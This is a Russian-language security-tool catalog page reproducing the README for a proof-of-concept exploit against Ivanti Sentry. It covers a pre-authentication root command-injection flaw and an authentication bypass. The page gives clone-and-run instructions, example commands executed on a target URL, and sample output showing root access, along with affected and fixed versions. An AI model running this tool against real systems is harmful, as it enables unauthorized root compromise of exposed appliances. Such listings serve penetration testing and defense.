Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Инструменты/GitHubGitHub/0xblackash/cve-2026-10520
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Репозиторий
4503 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🎯 CVE-2026-10520 & CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

Pre-Authentication Remote Code Execution + Authentication Bypass

Автор: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Обзор

Две критические уязвимости, затрагивающие Ivanti Sentry (ранее MobileIron Sentry):

  • CVE-2026-10520 → CVSS 10.0 - Внедрение команд ОС без аутентификации (RCE от root)
  • CVE-2026-10523 → CVSS 9.9 - Обход аутентификации

Эти уязвимости позволяют неаутентифицированным злоумышленникам полностью скомпрометировать систему.


✨ Особенности

  • ✅ Чистый и быстрый PoC
  • ✅ Без аутентификации (учётные данные не требуются)
  • ✅ Выполнение команд от root
  • ✅ Детальное форматирование вывода
Скачать инструмент
  • ✅ Поддержка прокси
  • ✅ Подробный режим (verbose)
  • ✅ Красивый интерфейс терминала

  • 🚀 Использование

    root@kitploit:~
    python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
    

    Примеры

    root@kitploit:~
    # Basic usage
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
    
    # Verbose mode
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
    
    # With proxy
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
    
    # Check kernel
    python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
    

    📋 Опции

    АргументОписаниеОбязательно
    --urlЦелевой URL (например, https://target:8443)Да
    --cmdКоманда для выполненияДа
    -v, --verboseВключить подробный выводНет
    --proxyHTTP прокси (хост:порт)Нет

    🛠️ Установка

    root@kitploit:~
    git clone https://github.com/0xBlackash/CVE-2026-10520.git
    cd CVE-2026-10520
    chmod +x CVE-2026-10520.py
    

    📷 Успешная эксплуатация

    Если уязвимость присутствует, вы увидите:

    root@kitploit:~
    
     ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
    ██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
    ██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
    ████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
    ╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
     ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
      
              CVE-2026-10520 & CVE-2026-10523 PoC Exploit
              Ivanti Sentry Pre-Auth RCE + Auth Bypass
              
              Author: Ashraf Zaryouh "0xBlackash"
              GitHub: https://github.com/0xBlackash
    
    
    [+] Target is VULNERABLE!
    Command Output:
    uid=0(root) gid=0(root) groups=0(root)
    

    ⚠️ Отказ от ответственности

    Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
    Несанкционированное использование против систем, которые вам не принадлежат, противозаконно.
    Автор не несёт ответственности за неправомерное использование.


    🔧 Затронутые версии

    • Ivanti Sentry до 10.5.2, 10.6.2, 10.7.1

    Исправлено в: 10.5.2 / 10.6.2 / 10.7.1


    📜 Ссылки

    • Официальное уведомление Ivanti
    • Оригинальное исследование watchTowr Labs
    • Записи NVD: CVE-2026-10520, CVE-2026-10523

    Сделано с ❤️ Ashraf Zaryouh "0xBlackash"

    Поставьте звезду репозиторию, если он был полезен! ⭐